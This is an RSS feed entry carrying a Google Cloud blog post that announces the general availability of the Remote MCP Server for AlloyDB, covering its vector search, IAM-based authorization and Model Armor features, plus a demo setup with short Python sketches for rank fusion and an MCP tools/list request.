Remote MCP Server for AlloyDB is now Generally 
Available</title><link>https://cloud.google.com/blog/products/data-analytics/alloydb-remote-mcp-server-ga-secure-ai-agent-access-to-your-data/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AI agents possess incredible reasoning capabilities and can perform increasingly complex actions. But the reliability of agentic outcomes depends entirely on the quality of the context they can access&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;— context that is frequently locked away in operational databases.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To bridge this gap, we are excited to announce that the Remote Model Context Protocol (MCP) Server for &lt;/span&gt;&lt;a href="https://cloud.google.com/products/alloydb?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is now generally available. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Model Context Protocol (MCP) is an open-source standard that gives LLMs a secure, consistent way to connect to external data sources. As part of Google Cloud’s recent rollout of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/google-managed-mcp-servers-are-available-for-everyone?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;50+ Google-managed MCP servers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this new integration makes it easier than ever for both interactive and autonomous agents to securely harness the full power of your enterprise data. For example, you can now ask an AI agent for an up-to-the-millisecond view of your delivery fleet by connecting it to your real-time logistics data in AlloyDB, avoiding inaccuracies due to stale data and reducing the need for manual reporting.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why AlloyDB is a strong foundation for agentic apps&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By connecting MCP to AlloyDB, your agents get access to the premier database built for enterprise-grade AI. AlloyDB delivers the scale, speed, and intelligence required for the most demanding agentic workloads:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Supercharged vector performance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Scale to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/choose-index-strategy#:~:text=Scales%20well%20to%2010B%20vectors"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;over 10 billion vectors&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; at up to 6x the speed of standard PostgreSQL for vector queries (and up to 10x faster for &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/filtered-vector-search-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;filtered queries&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) with the ScaNN index.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Advanced search and reranking:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Power multimodal applications with hybrid search via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/create-rum-index"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RUM&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (in Preview) and intelligent reranking through Reciprocal Rank Fusion (RRF) or &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/rank-rerank-search-results-rag"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Platform models&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Real-time intelligence:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Efficiently generate &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/generate-manage-auto-embeddings-for-tables"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;millions of embeddings&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; using built-in &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/ai-query-engine-landing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to facilitate low-latency, real-time agentic experiences.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified data access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Give agents a single PostgreSQL interface to seamlessly join operational data in AlloyDB with analytical data in BigQuery or archived data in Iceberg tables via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/bigquery-view-alloydb-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lakehouse Federation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enterprise-grade scale:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rest easy with a &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb/sla?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;99.99% SLA&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/overview#automatic"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;autopilot&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; database optimizations, and auto-scaling read pools with up to 20 nodes. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
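&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For readers unfamiliar with Reciprocal Rank Fusion, here is a generic Python sketch of the technique. It is not AlloyDB's implementation. It assumes each retriever returns an ordered list of document IDs, and it uses the commonly cited smoothing constant of 60. The function name and sample IDs are hypothetical.&lt;/span&gt;&lt;/p&gt;

```python
from collections import defaultdict


def reciprocal_rank_fusion(rankings, k=60):
    """Fuse several ranked lists: each list adds 1 / (k + rank) to a document's score."""
    scores = defaultdict(float)
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking, start=1):
            scores[doc_id] += 1.0 / (k + rank)
    # Highest fused score first; ties are broken by document ID for determinism.
    return sorted(scores, key=lambda doc_id: (-scores[doc_id], doc_id))


# Hypothetical results from a vector search and a keyword search.
vector_hits = ["a", "b", "c"]
keyword_hits = ["b", "d", "a"]

fused = reciprocal_rank_fusion([vector_hits, keyword_hits])
print(fused)
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Documents that rank well in both lists rise to the top, which is why the technique suits hybrid search: it needs only rank positions, not comparable scores.&lt;/span&gt;&lt;/p&gt;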
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why Remote MCP matters for AlloyDB&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Local MCP servers are great for local development, but communicating over standard input/output (stdio) streams becomes difficult when you scale to production workloads. It is both architecturally complex and administratively burdensome to provision and manage all of the infrastructure and security guardrails you need to run agents for high-value use cases that interact with sensitive operational data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Remote MCP Server for AlloyDB runs on fully-managed Google Cloud infrastructure and exposes an HTTP endpoint that connects your AI applications to your data. This solves key challenges for teams building agents on PostgreSQL:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Centralized discovery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Find, secure, and manage your database's MCP server using &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/agent-registry/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Registry&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Fully-managed HTTP endpoints&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: No need to deploy or maintain the infrastructure required for connectivity. Configure your agent to use the endpoint to get started.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Fine-grained authorization&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Instead of using shared database passwords or API keys, you use &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Identity and Access Management (IAM)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to restrict agents to specific tables, schemas, or views. With the read-only execute SQL tool, you can prevent your agent from accidentally changing or deleting data in your database. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Operational instance management&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The AlloyDB toolset gives agents the ability to do more than run queries. Agents can update instances, export and import data, create backups, and restore clusters.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Model Armor protection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/model-armor?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Armor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provides optional prompt and response security to screen and filter data, defending against prompt injections or accidental data exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Audit logging&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Every query, action, and tool call goes to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/audit"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Audit Logs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, giving security teams a full audit trail.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Let's see it in action: A quick demo&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Getting started with the Remote MCP Server for AlloyDB is straightforward. To see it in action in your own environment, you can follow our &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/alloydb-ai-mcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;new Codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which guides you through these essential steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;API &amp;amp; environment prep&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enable the AlloyDB, &lt;/span&gt;&lt;a href="https://cloud.google.com/products/compute?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Compute Engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://cloud.google.com/products/gemini-enterprise-agent-platform?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; APIs in your Google Cloud project.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Provision your database&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Deploy your AlloyDB cluster, create your database, and import your sample data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enable the Data Access API&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Turn on the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/use-alloydb-mcp#execute-sql"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Data Access API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for your AlloyDB instance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Connect the agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Configure your MCP client by providing the remote endpoint (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://alloydb.googleapis.com/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;). Pass your Google Cloud IAM credentials using an OAuth 2.0 bearer token in the HTTP Authorization header.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
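&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make the last step concrete, here is a minimal Python sketch of what a client request to the endpoint might look like. It builds, but does not send, a JSON-RPC &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;tools/list&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; request as defined by the MCP specification, with the bearer token in the Authorization header. The function name and placeholder token are hypothetical, and a real MCP client normally performs an &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;initialize&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; handshake first, so treat this as an illustration of the request shape rather than a complete client.&lt;/span&gt;&lt;/p&gt;

```python
import json
import urllib.request

# Endpoint quoted in the steps above.
MCP_ENDPOINT = "https://alloydb.googleapis.com/mcp"


def build_tools_list_request(access_token, request_id=1):
    """Build (without sending) a JSON-RPC 2.0 request that lists the server's tools."""
    payload = {"jsonrpc": "2.0", "id": request_id, "method": "tools/list"}
    return urllib.request.Request(
        MCP_ENDPOINT,
        data=json.dumps(payload).encode("utf-8"),
        headers={
            # OAuth 2.0 bearer token carrying the caller's IAM identity.
            "Authorization": "Bearer " + access_token,
            "Content-Type": "application/json",
            # MCP's HTTP transport lets the server answer with JSON or an event stream.
            "Accept": "application/json, text/event-stream",
        },
        method="POST",
    )


# Placeholder token: substitute a real access token before sending anything.
request = build_tools_list_request("REPLACE_WITH_ACCESS_TOKEN")
print(request.get_method(), request.full_url)
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In practice most agent frameworks handle this exchange for you once you supply the endpoint URL and credentials. For local experiments, one common way to obtain a short-lived token is &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud auth print-access-token&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;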
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the connection is established, your agent can provide reliable, grounded answers to complex business questions using your real-time operational data. By performing introspection queries, the agent automatically understands your database schema – including tables and columns – enabling it to construct sophisticated joins and queries to fulfill user requests accurately.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;
  &lt;div class="article-module h-c-page"&gt;
    &lt;div class="h-c-grid"&gt;
      &lt;figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3"&gt;
        &lt;img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1_-_Setup.gif" alt="1 - Setup"&gt;
      &lt;/figure&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once your agent has access to the AlloyDB toolset, it can execute queries, analyze operational trends, and dynamically rank text data using AlloyDB &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/ai-query-engine-landing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.RANK()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;
  &lt;div class="article-module h-c-page"&gt;
    &lt;div class="h-c-grid"&gt;
      &lt;figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3"&gt;
        &lt;img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/2_-_Rank.gif" alt="2 - Rank"&gt;
      &lt;/figure&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security remains paramount: the Remote MCP Server for AlloyDB integrates seamlessly with Model Armor. This provides protection against sensitive data leaks, even if the agent’s service account possesses broad access permissions within the database. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;
  &lt;div class="article-module h-c-page"&gt;
    &lt;div class="h-c-grid"&gt;
      &lt;figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3"&gt;
        &lt;img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/3_-_Secure.gif" alt="3 - Secure"&gt;
      &lt;/figure&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Watch the full demo below!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=-dPZ19fGM20"
      data-glue-modal-trigger="uni-modal--dPZ19fGM20-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_ZNMrpaE.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;How to connect AI agents directly to your enterprise data: Introducing the AlloyDB remote MCP server&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal--dPZ19fGM20-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="-dPZ19fGM20"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=-dPZ19fGM20"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What's next&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By enabling agents to interact securely with transactional data, we are embracing an architecture where AI agents can reliably access and act upon your enterprise’s single source of truth. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to build? Discover AlloyDB with a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/free-trial-cluster"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;30-day free trial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and dive into the &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/alloydb-ai-mcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Remote MCP for AlloyDB Codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to start powering your enterprise agentic applications today.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Mon, 01 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/alloydb-remote-mcp-server-ga-secure-ai-agent-access-to-your-data/</guid><category>AI &amp; Machine Learning</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>The fully-managed Remote MCP Server for AlloyDB is now Generally Available</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/alloydb-remote-mcp-server-ga-secure-ai-agent-access-to-your-data/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Paul Ramsey</name><title>Product Manager, AlloyDB, Cloud SQL, Google Cloud</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Gleb Otochkin</name><title>Cloud Advocate, Databases, Google Cloud</title><department></department><company></company></author></item></channel></rss>